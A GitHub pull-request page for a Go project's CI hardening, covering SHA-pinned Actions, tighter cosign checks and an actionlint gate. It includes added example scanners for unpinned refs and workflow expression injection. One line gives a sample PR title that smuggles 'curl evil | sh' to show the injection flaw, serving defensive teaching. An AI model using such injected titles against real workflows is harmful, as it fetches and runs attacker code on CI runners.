[chore] follow-ups omnibus: SHA-pin Actions + idiom sweep + cleanup#55

Merged
trilamsr merged 1 commit into
mainfrom
worktree-followups-omnibus
May 18, 2026
Conversation

@trilamsr

@trilamsr trilamsr commented May 18, 2026

Contributor

What this PR does

Bundles 8 ready-now items from docs/FOLLOWUPS.md whose triggers were
satisfied; closes 2 more as already-shipped or already-satisfied. Three
themes: CI/release-pipeline hardening, code-quality sweeps, and
FOLLOWUPS hygiene.

CI / release-pipeline hardening:

  • SHA-pin every GitHub Actions ref across all workflows. Dependabot's
    github-actions group keeps these bumped weekly as one grouped PR.
  • Reconcile actions/upload-artifact major-version drift: callsites
    were split between @v5 and @v7.0.1. Unified on v7.0.1.
  • Tighten cosign verify-blob smoke check with --certificate-github-workflow-ref refs/tags/$TAG and --trigger push. Strictly tighter than the prior IDENTITY_REGEXP-only check.
  • Mirror tightened flags in docs/reproducibility.md step 5; add --source-ref / --source-digest to step 6's gh attestation verify.
  • Emit Rekor logIndex URL into release notes so transparency-log audits don't require bundle archaeology.
  • Wire make mod-verify into make ci.

Code-quality sweeps:

  • Convert ~49 C-style for i := 0; i < N; i++ loops to Go 1.22+ for i := range N (or for range N when the index is unused). 6 holdouts have non-convertible conditions (compound &&, i += 2, or non-i predicate).
  • Backfill 18 raw "Normal"/"Warning" sites in k8sevents tests to use EventTypeNormal / EventTypeWarning constants.
  • Export k8sevents.ComponentType = "k8s_events"; convert 8 test callsites.
  • Lock the no-Server-header invariant in internal/telemetry with a test. (Audit finding: Go's net/http does not emit a default Server header in any path; the FOLLOWUPS row had nothing to strip — the test prevents future regression.)

Closed-as-stale (no code change, FOLLOWUPS updated with rationale):

Linked issue(s)

No linked issue.

Release notes

[SECURITY] All GitHub Actions are now SHA-pinned; cosign and gh attestation verification flags are tightened to bind to the exact release tag and `push` trigger.
[ENHANCEMENT] Release notes include a Rekor transparency-log entry URL for after-the-fact audit.

Checklist

  • Tests added or updated (TestServer_NoServerHeader; existing tests continue to pass)
  • make ci passes on the worktree branch (exit 0)
  • Commits are signed off
  • No new components; existing component STYLE.md layout untouched

Test plan

  • make ci exit 0 (coverage above floor, govulncheck clean, doc-check + alert-check pass, vet clean across default + dcgm build tags)
  • CI green on this PR
  • Release dry-run not exercised — release workflow only fires on tag push; flag-tightening + Rekor URL emission verified by inspection rather than e2e. Worth a manual workflow_dispatch once merged or at next tag cut.

🤖 Generated with Claude Code
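
An added check for the SHA-pinning item in the PR body above; this is example code written for this page, not the project's workflows, Makefile or Dependabot config. It scans workflow YAML for `uses:` references that are not pinned to a full 40-hex commit SHA, skipping local (`./`) actions and `docker://` images, which are pinned by other means. The sample workflow, its action names and the 40-hex value in it are constructed for the example.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

var (
	// A step's `uses:` entry, quoted or not, with an optional trailing comment.
	usesRe = regexp.MustCompile(`^\s*(?:-\s+)?uses:\s*["']?([^\s"'#]+)`)
	// Full-length git object id: the only immutable form of an Actions ref.
	fullSHARe = regexp.MustCompile(`^[0-9a-f]{40}$`)
	// Abbreviated object id: looks pinned, but is not what GitHub documents.
	shortSHARe = regexp.MustCompile(`^[0-9a-f]{7,39}$`)
)

// Finding is one `uses:` reference that is not pinned to a full commit SHA.
type Finding struct {
	Line   int
	Ref    string
	Reason string
}

// UnpinnedUses scans workflow YAML and reports every `uses:` reference that
// can move underneath the workflow. Local actions (./path) are versioned with
// the repository itself and docker:// images are pinned by digest, so both are
// skipped; everything else must end in @<40-hex SHA>.
func UnpinnedUses(workflow string) []Finding {
	var out []Finding
	for i, line := range strings.Split(workflow, "\n") {
		m := usesRe.FindStringSubmatch(line)
		if m == nil {
			continue
		}
		ref := m[1]
		if strings.HasPrefix(ref, "./") || strings.HasPrefix(ref, "docker://") {
			continue
		}
		at := strings.LastIndex(ref, "@")
		if at < 0 {
			out = append(out, Finding{i + 1, ref, "no @ref: resolves to the action's default branch"})
			continue
		}
		version := ref[at+1:]
		switch {
		case fullSHARe.MatchString(version):
			// Pinned. The trailing "# vX.Y.Z" comment is what Dependabot reads
			// to bump the SHA, so its absence is a hygiene issue, not a pin failure.
		case shortSHARe.MatchString(version):
			out = append(out, Finding{i + 1, ref, "abbreviated SHA; pin the full 40-hex commit id"})
		default:
			out = append(out, Finding{i + 1, ref, "mutable tag or branch ref " + version})
		}
	}
	return out
}

// sampleWorkflow is constructed for this example; the 40-hex value is made up.
const sampleWorkflow = `name: ci
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567 # v4.2.2
      - uses: actions/setup-go@v5
      - uses: actions/upload-artifact@v7.0.1
      - uses: example/short-pin@0123456
      - uses: example/floating@main
      - uses: example/no-ref
      - uses: ./.github/actions/local
      - uses: docker://alpine:3.20
`

func main() {
	for _, f := range UnpinnedUses(sampleWorkflow) {
		fmt.Printf("line %d: %s: %s\n", f.Line, f.Ref, f.Reason)
	}
}
```

Run over the real `.github/workflows/*.yml` files this is the pre-merge gate the omnibus PR had to do by hand; a tag like `@v7.0.1` is still a mutable ref (the tag can be moved), which is why the version-unification item and the SHA-pin item are separate rows.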

…leanup

Bundles 8 ready-now items from docs/FOLLOWUPS.md whose triggers were
satisfied. Two further items were verified stale during execution and
closed in the FOLLOWUPS file rather than re-implemented.

CI / release-pipeline hardening:
- SHA-pin every GitHub Actions ref across all workflows (checkout,
  setup-go, upload-artifact, codeql-action/*, setup-qemu-action,
  govulncheck-action). Dependabot's github-actions group keeps these
  bumped weekly as one grouped PR.
- Reconcile actions/upload-artifact major-version drift: callsites
  were split across @v5 (chaos / kernelevents-integration /
  nccl-fr-fuzz-nightly) and @v7.0.1 (release / ci). Unified on v7.0.1.
- Tighten cosign verify-blob smoke check with
  --certificate-github-workflow-ref refs/tags/$TAG and --trigger push.
  Strictly tighter than the prior IDENTITY_REGEXP-only check; binds to
  this exact tag and rejects workflow_dispatch bundles.
- Mirror the tightened flags in docs/reproducibility.md step 5; add
  --source-ref / --source-digest to step 6's gh attestation verify.
- Emit Rekor logIndex URL into the release body so transparency-log
  audits don't require bundle archaeology.
- Wire `make mod-verify` into `make ci` (cheap GOPROXY defense).

Code-quality sweeps:
- Convert ~49 C-style `for i := 0; i < N; i++` loops to Go 1.22+
  `for i := range N` (or `for range N` when the index is unused).
  6 holdouts have non-convertible conditions (compound &&,
  non-unit `i += 2`, or non-`i` predicate).
- Backfill 18 raw "Normal"/"Warning" sites in components/receivers/
  k8sevents tests to use EventTypeNormal / EventTypeWarning constants.
- Export k8sevents.ComponentType = "k8s_events"; convert 8 test
  callsites of pipeline.MustNewType("k8s_events") to use the constant.
- Lock the no-Server-header invariant with TestServer_NoServerHeader
  in internal/telemetry. (Audit: Go's net/http does not emit a default
  Server header in any path; the FOLLOWUPS row "Server: header strip"
  has nothing to strip — the test prevents future regression.)

Closed-as-stale (no code change, FOLLOWUPS updated with rationale):
- Next-up #1 `make doc-check`: shipped previously (Makefile:192, in
  `make ci` chain) but FOLLOWUPS still listed it as next-up.
- M8 opportunistic "promote build-tags to pr-validation.yml":
  ci.yml:37 already runs `make build-tags` as its own named step
  and no `pr-validation.yml` workflow exists in the tree.

Verification:
- `make ci` exit 0 on the worktree branch.
- Coverage above floor on every package, govulncheck clean, doc-check
  + alert-check pass, vet clean across default + dcgm build tags.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Signed-off-by: Tri Lam <trilamsr@gmail.com>
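
The no-Server-header invariant from the commit message above, demonstrated as added example code for this page (not the project's `TestServer_NoServerHeader`): a plain net/http handler served through httptest yields no Server header, a handler that sets one leaks it, and a WriteHeader-time middleware strips it again. The handler names and the `my-collector/1.2.3` value are made up.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
)

// ServerHeaderOf serves h through an httptest server, issues one GET and
// returns the response's Server header value ("" when the header is absent).
func ServerHeaderOf(h http.Handler) (string, error) {
	srv := httptest.NewServer(h)
	defer srv.Close()
	resp, err := http.Get(srv.URL)
	if err != nil {
		return "", err
	}
	defer resp.Body.Close()
	return resp.Header.Get("Server"), nil
}

// stripServer removes Server at WriteHeader time. Deleting it after the
// handler returns would be too late: headers are on the wire once the first
// byte of the body is written.
type stripServer struct {
	http.ResponseWriter
	wroteHeader bool
}

func (s *stripServer) WriteHeader(code int) {
	if s.wroteHeader {
		return
	}
	s.wroteHeader = true
	s.ResponseWriter.Header().Del("Server")
	s.ResponseWriter.WriteHeader(code)
}

func (s *stripServer) Write(b []byte) (int, error) {
	// An implicit 200 from the embedded writer would bypass our WriteHeader.
	if !s.wroteHeader {
		s.WriteHeader(http.StatusOK)
	}
	return s.ResponseWriter.Write(b)
}

// StripServerHeader is the middleware a project would add if a handler or a
// dependency ever started emitting Server; net/http itself never does.
func StripServerHeader(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		next.ServeHTTP(&stripServer{ResponseWriter: w}, r)
	})
}

// PlainHandler writes a body and sets nothing; the stdlib adds Date,
// Content-Type and Content-Length but no Server.
var PlainHandler = http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
	w.Write([]byte("ok"))
})

// LeakyHandler stands in for a library that advertises itself (made-up value).
var LeakyHandler = http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
	w.Header().Set("Server", "my-collector/1.2.3")
	w.Write([]byte("ok"))
})

func main() {
	for name, h := range map[string]http.Handler{
		"plain":          PlainHandler,
		"leaky":          LeakyHandler,
		"leaky+stripped": StripServerHeader(LeakyHandler),
	} {
		v, err := ServerHeaderOf(h)
		fmt.Printf("%-15s Server=%q err=%v\n", name, v, err)
	}
}
```

The first case is the audit finding restated as a check: with nothing to strip, a regression test that asserts `Server == ""` on the real telemetry mux is the whole fix. The middleware is only there to show where a strip would have to live if the finding ever changes.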
@trilamsr trilamsr merged commit a5af62f into main May 18, 2026
17 of 18 checks passed
@trilamsr trilamsr deleted the worktree-followups-omnibus branch May 18, 2026 19:13
trilamsr added a commit that referenced this pull request May 18, 2026
## What this PR does

Backfills documentation tracking that PR #55 (the follow-ups omnibus)
didn't touch:

1. **`CHANGELOG.md`** — new `### Security` section under `[Unreleased]`
   with the SHA-pin / cosign-flag-tightening entries; new `### Changed`
   rows for the Rekor `logIndex` URL emission in release notes and
   `mod-verify` wired into `make ci`.
2. **`docs/notes/pr-workflow.md`** — repo-wide lesson: audit
   `docs/FOLLOWUPS.md` rows for staleness *before* implementing. 2 of
   10 omnibus items were already shipped but still listed; trust the
   code, not the row.
3. **`.claude/notes/automation.md`** — agent-internal lesson: don't
   escape backticks inside a single-quoted HEREDOC. PR #55's body fed
   the `pr-lint` awk regex literal backslashes instead of
   triple-backticks; the required check went red until the body was
   re-edited via `gh pr edit`.

No code changes; `make doc-check` clean.

## Linked issue(s)

_No linked issue._

## Release notes

```release-notes
NONE
```

## Checklist

- [x] No code change; docs-only
- [x] `make doc-check` passes
- [x] Commits are signed off

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Signed-off-by: Tri Lam <trilamsr@gmail.com>
Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
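
An added example for the Rekor `logIndex` URL item tracked in the CHANGELOG entry above; it is written for this page, not taken from the project's release workflow. It parses a Sigstore bundle's `verificationMaterial.tlogEntries[].logIndex` (a string, since proto3 JSON encodes int64 that way) or, as a fallback, the older cosign `--bundle` layout's `rekorBundle.Payload.logIndex` (a number), and builds the transparency-log URLs a release body can link. The search.sigstore.dev and rekor.sigstore.dev URL forms and the Markdown line are assumptions of this example; the PR does not show which URL it emits. Both bundle documents are constructed, with made-up index values.

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
	"strconv"
	"strings"
)

// flexInt64 accepts "123" (proto3 JSON encodes int64 as a string, which is what
// Sigstore bundles carry) and 123 (legacy cosign rekorBundle payloads).
type flexInt64 int64

func (f *flexInt64) UnmarshalJSON(b []byte) error {
	n, err := strconv.ParseInt(strings.Trim(string(b), `"`), 10, 64)
	if err != nil {
		return fmt.Errorf("transparency-log field %s: %w", b, err)
	}
	*f = flexInt64(n)
	return nil
}

type tlogEntry struct {
	LogIndex       flexInt64 `json:"logIndex"`
	IntegratedTime flexInt64 `json:"integratedTime"`
}

// bundle models only the fields needed here, from both the Sigstore bundle
// layout and the older cosign --bundle layout.
type bundle struct {
	MediaType            string `json:"mediaType"`
	VerificationMaterial struct {
		TlogEntries []tlogEntry `json:"tlogEntries"`
	} `json:"verificationMaterial"`
	RekorBundle *struct {
		Payload tlogEntry `json:"Payload"`
	} `json:"rekorBundle"`
}

// RekorRef is what a release body can link for after-the-fact audit.
type RekorRef struct {
	LogIndex  int64
	SearchURL string // human-facing transparency-log search (assumed URL form)
	APIURL    string // machine-facing Rekor entry lookup (assumed URL form)
}

// RekorRefs extracts every transparency-log index from a bundle and refuses a
// bundle with none: a release note without a log entry is not auditable.
func RekorRefs(bundleJSON []byte) ([]RekorRef, error) {
	var b bundle
	if err := json.Unmarshal(bundleJSON, &b); err != nil {
		return nil, err
	}
	entries := b.VerificationMaterial.TlogEntries
	if len(entries) == 0 && b.RekorBundle != nil {
		entries = []tlogEntry{b.RekorBundle.Payload}
	}
	if len(entries) == 0 {
		return nil, errors.New("bundle carries no transparency-log entry")
	}
	refs := make([]RekorRef, 0, len(entries))
	for _, e := range entries {
		idx := int64(e.LogIndex)
		refs = append(refs, RekorRef{
			LogIndex:  idx,
			SearchURL: fmt.Sprintf("https://search.sigstore.dev/?logIndex=%d", idx),
			APIURL:    fmt.Sprintf("https://rekor.sigstore.dev/api/v1/log/entries?logIndex=%d", idx),
		})
	}
	return refs, nil
}

// ReleaseNoteLine renders the Markdown line a release workflow would append.
func ReleaseNoteLine(r RekorRef) string {
	return fmt.Sprintf("Transparency log: [Rekor entry %d](%s)", r.LogIndex, r.SearchURL)
}

// Both documents are constructed for this example with made-up index values.
const sigstoreBundle = `{
  "mediaType": "application/vnd.dev.sigstore.bundle.v0.3+json",
  "verificationMaterial": {
    "tlogEntries": [
      {"logIndex": "123456789", "integratedTime": "1700000000",
       "kindVersion": {"kind": "hashedrekord", "version": "0.0.1"}}
    ]
  }
}`

const legacyCosignBundle = `{"rekorBundle": {"Payload": {"logIndex": 42, "integratedTime": 1700000000}}}`

func main() {
	for _, doc := range []string{sigstoreBundle, legacyCosignBundle, `{"mediaType": "x"}`} {
		refs, err := RekorRefs([]byte(doc))
		if err != nil {
			fmt.Println("error:", err)
			continue
		}
		for _, r := range refs {
			fmt.Println(ReleaseNoteLine(r), "|", r.APIURL)
		}
	}
}
```

The error path matters more than the happy path: if the release step ever runs with a bundle that has no tlog entry (for example a signing run that fell back to no transparency upload), the note should fail loudly rather than silently omit the link.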
trilamsr added a commit that referenced this pull request May 19, 2026
Adds actionlint (https://github.com/rhysd/actionlint) as a CI gate
covering all `.github/workflows/*.yml` files. Catches yaml syntax
issues and shellcheck violations in `run:` blocks before they break a
PR's required-check.

Wired via the existing repo convention: `go get -tool` adds it to the
go.mod tool stanza (alongside golangci-lint, gofumpt, addlicense,
goimports, govulncheck). `make actionlint` invokes `go tool
actionlint`, so the version is pinned in go.sum and Dependabot's
weekly go-deps group keeps it bumped.

Audit result: zero findings on current workflows. The PR #55 sweep
(SHA-pin all Actions) had no actionlint validating it; this gate
ensures the next workflow yaml edit doesn't ship a regression.

Closes the actionlint half of the FOLLOWUPS "CI Actions linters" row.
zizmor remains open as a separate follow-up — it surfaces a
different finding class (expression injection, untrusted input in
run-blocks, over-broad permissions) and is expected to produce real
findings on release.yml's 400 lines.

Verification:
- `make actionlint` exit 0 (10 workflow files clean)
- `make ci` exit 0 end-to-end

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Signed-off-by: Tri Lam <trilamsr@gmail.com>
trilamsr added a commit that referenced this pull request May 19, 2026
## What this PR does

Adds [actionlint](https://github.com/rhysd/actionlint) as a CI gate
covering `.github/workflows/*.yml`. Catches yaml syntax issues and
shellcheck violations in `run:` blocks before they break a PR's
required-check.

Wired via the existing repo convention: `go get -tool` adds it to
the go.mod tool stanza (alongside golangci-lint, gofumpt,
addlicense, goimports, govulncheck). `make actionlint` invokes
`go tool actionlint`, so the version is pinned in go.sum and
Dependabot's weekly go-deps group keeps it bumped.

**Audit result: zero findings on current workflows.** The PR #55
sweep (SHA-pin all Actions) had no actionlint validating it; this
gate ensures the next workflow yaml edit doesn't ship a regression.

Closes the actionlint half of the FOLLOWUPS "CI Actions linters"
row. zizmor remains open as a separate follow-up — different
finding class (expression injection, untrusted input in run-blocks,
over-broad permissions) and expected to produce real findings on
release.yml's 400 lines.

## Linked issue(s)

_No linked issue._

## Release notes

```release-notes
NONE
```

## Checklist

- [x] `make actionlint` exit 0 (10 workflow files clean)
- [x] `make ci` exit 0 end-to-end
- [x] go.mod / go.sum tidied (`make tidy-check` passes)
- [x] Commits are signed off

## Test plan

- [x] Local `make ci` green
- [ ] CI green on this PR
- [ ] After merge: a future PR that introduces a yaml syntax error or
shellcheck-flagged `run:` block fails the new gate

🤖 Generated with [Claude Code](https://claude.com/claude-code)

---------

Signed-off-by: Tri Lam <trilamsr@gmail.com>
Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
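
For the expression-injection finding class the commit message above leaves to zizmor, an added example written for this page (it is neither zizmor nor the project's code): a line-oriented scanner that tracks which lines belong to a `run:` value and flags `${{ ... }}` expressions rooted in attacker-influenced contexts (`github.event.*`, `github.head_ref`, `inputs.*`). The sample workflow is constructed and places the vulnerable steps next to the hardened form (the value routed through `env:` and read as a shell variable); the untrusted-root list is a simplification of zizmor's model.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

var (
	// A `run:` key, possibly as the first key of a step (`- run:`).
	runKeyRe = regexp.MustCompile(`^\s*(?:-\s+)?run:\s*(.*)$`)
	// One ${{ ... }} expression; the capture is the expression body.
	exprRe = regexp.MustCompile(`\$\{\{\s*([^}]*?)\s*\}\}`)
	// Expression roots an outside party controls: event payloads (PR title,
	// body, branch names), head_ref, workflow_dispatch inputs. Spliced into a
	// script before the shell runs, they are code, not data. Simplified from
	// zizmor's model, which also knows context-specific safe fields.
	untrustedRe = regexp.MustCompile(`^(github\.event\.|github\.head_ref|inputs\.)`)
)

// Finding is one attacker-influenced expression inside a run: script.
type Finding struct {
	Line int
	Expr string
}

func scanLine(n int, s string) []Finding {
	var out []Finding
	for _, m := range exprRe.FindAllStringSubmatch(s, -1) {
		if untrustedRe.MatchString(m[1]) {
			out = append(out, Finding{Line: n, Expr: m[1]})
		}
	}
	return out
}

// RunBlockInjections walks workflow YAML line by line, tracks which lines are
// the value of a run: key (inline, or a | / > block scalar whose extent is set
// by the indentation of its first non-blank line) and reports every untrusted
// ${{ }} in them. Expressions elsewhere (env:, with:, name:) are data, not
// script, and are left alone.
func RunBlockInjections(workflow string) []Finding {
	var out []Finding
	inBlock, contentIndent := false, -1
	for i, line := range strings.Split(workflow, "\n") {
		indent := len(line) - len(strings.TrimLeft(line, " "))
		blank := strings.TrimSpace(line) == ""
		if inBlock {
			if contentIndent < 0 && !blank {
				contentIndent = indent
			}
			if blank || indent >= contentIndent {
				out = append(out, scanLine(i+1, line)...)
				continue
			}
			inBlock, contentIndent = false, -1 // dedent ends the block scalar
		}
		m := runKeyRe.FindStringSubmatch(line)
		if m == nil {
			continue
		}
		val := strings.TrimSpace(m[1])
		if strings.HasPrefix(val, "|") || strings.HasPrefix(val, ">") {
			inBlock = true
			continue
		}
		out = append(out, scanLine(i+1, val)...)
	}
	return out
}

// sampleWorkflow is constructed for this example.
const sampleWorkflow = `name: triage
on: [pull_request_target, workflow_dispatch]
jobs:
  triage:
    runs-on: ubuntu-latest
    steps:
      - name: vulnerable inline (title is spliced into the script before bash runs)
        run: echo "new PR: ${{ github.event.pull_request.title }}"
      - name: vulnerable block scalar
        run: |
          git checkout ${{ github.head_ref }}
          echo "commit ${{ github.sha }}"   # github.sha is not attacker-chosen
        env:
          TAG: ${{ inputs.tag }}
      - name: hardened (same data, passed through an env var, read as $TITLE)
        env:
          TITLE: ${{ github.event.pull_request.title }}
        run: echo "new PR: $TITLE"
`

func main() {
	for _, f := range RunBlockInjections(sampleWorkflow) {
		fmt.Printf("line %d: untrusted expression in run: block: %s\n", f.Line, f.Expr)
	}
}
```

The hardened step is the standard fix: the runner still expands the expression, but into an environment variable, so a title like `x"; curl evil | sh; echo "` arrives in the script as the contents of `$TITLE` rather than as script text. A real scanner also has to follow `uses:` calls into composite actions and handle `pull_request_target` / `issue_comment` triggers specially, which is why zizmor stays its own follow-up.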
trilamsr added a commit that referenced this pull request May 19, 2026
## What this PR does

Follow-up to #64 (zizmor security-lint gate). Trims comments that
didn't pass the six-months-cold-reader test. The commit was prepared
on the #64 branch but pushed seconds after that PR auto-merged, so it
never made it in — re-applying as a standalone follow-up.

Comments trimmed:

- `scripts/zizmor.sh`: dropped per-flag descriptions in the header
  block — `--no-progress` and `--config` don't need explainers; the
  WHY for `--min-severity=high` stays. Also fixed a stale error-
  message prefix copied from register-lint.
- `.github/zizmor.yml`: 6 lines → 3. Kept the one load-bearing claim
  ("ignores live inline").
- `release.yml` cache-poisoning ignores: 6 lines → 2. Kept the WHY
  (cache keyed on go.sum, trust root M3 already validates); dropped
  the meta-pointer to zizmor.yml (which no longer carries the
  rationale) and the audit-confidence parens.
- `release.yml` INPUT_TAG env comment: 4 lines → 2.

No behavior change. `make ci` exit 0 (one transient kernelevents
flake on first run, passed on retry — same intermittent test seen
in this session's PRs #55, #60, #62, #63, #64).

## Linked issue(s)

_No linked issue._ Follows up #64.

## Release notes

```release-notes
NONE
```

## Checklist

- [x] `make ci` exit 0
- [x] No behavior change; pure documentation hygiene
- [x] Commits are signed off

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Signed-off-by: Tri Lam <trilamsr@gmail.com>
Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
trilamsr added a commit that referenced this pull request May 19, 2026
#68)

## What this PR does

Two small fixes that turn this session's lessons into code instead of
notes-to-self:

### 1. Deflake `TestJournaldSource_StreamsMockOutput`

The 2s deadline for the mock-journalctl test was tight on loaded
macOS / CI runners — subprocess spawn + fixture read + goroutine
schedule could miss it. The test flaked on 5 of 5 PRs in this
session that exercised the full suite (#55, #60, #62, #63, #64).

Bumped the deadline 2s → 5s. The non-flake budget for "no record
ever emitted" regressions stays well under the deadline; 5s just
absorbs runner jitter without hiding real bugs.

### 2. Warn locally when `shellcheck` isn't on PATH

`actionlint` silently skips run-block shellcheck when shellcheck
isn't on PATH (macOS doesn't ship shellcheck by default). PR #62
passed `make actionlint` locally and then surfaced 4 shellcheck
findings in CI — exactly the failure mode the gate is supposed to
prevent.

`make actionlint` now prints a `WARNING: shellcheck not on PATH;
actionlint will skip run-block shellcheck.` line with `brew
install` / `apt-get install` hints when the binary is missing.
The underlying lint still runs; the warning just makes the gap
visible to the macOS dev.

## Linked issue(s)

_No linked issue._

## Release notes

```release-notes
NONE
```

## Checklist

- [x] `make ci` exit 0 (test passes deterministically with new deadline)
- [x] `make actionlint` shows the warning when shellcheck is uninstalled
(verified locally)
- [x] No behavior change in CI (shellcheck already on Linux runners)
- [x] Commits are signed off

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Signed-off-by: Tri Lam <trilamsr@gmail.com>
Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>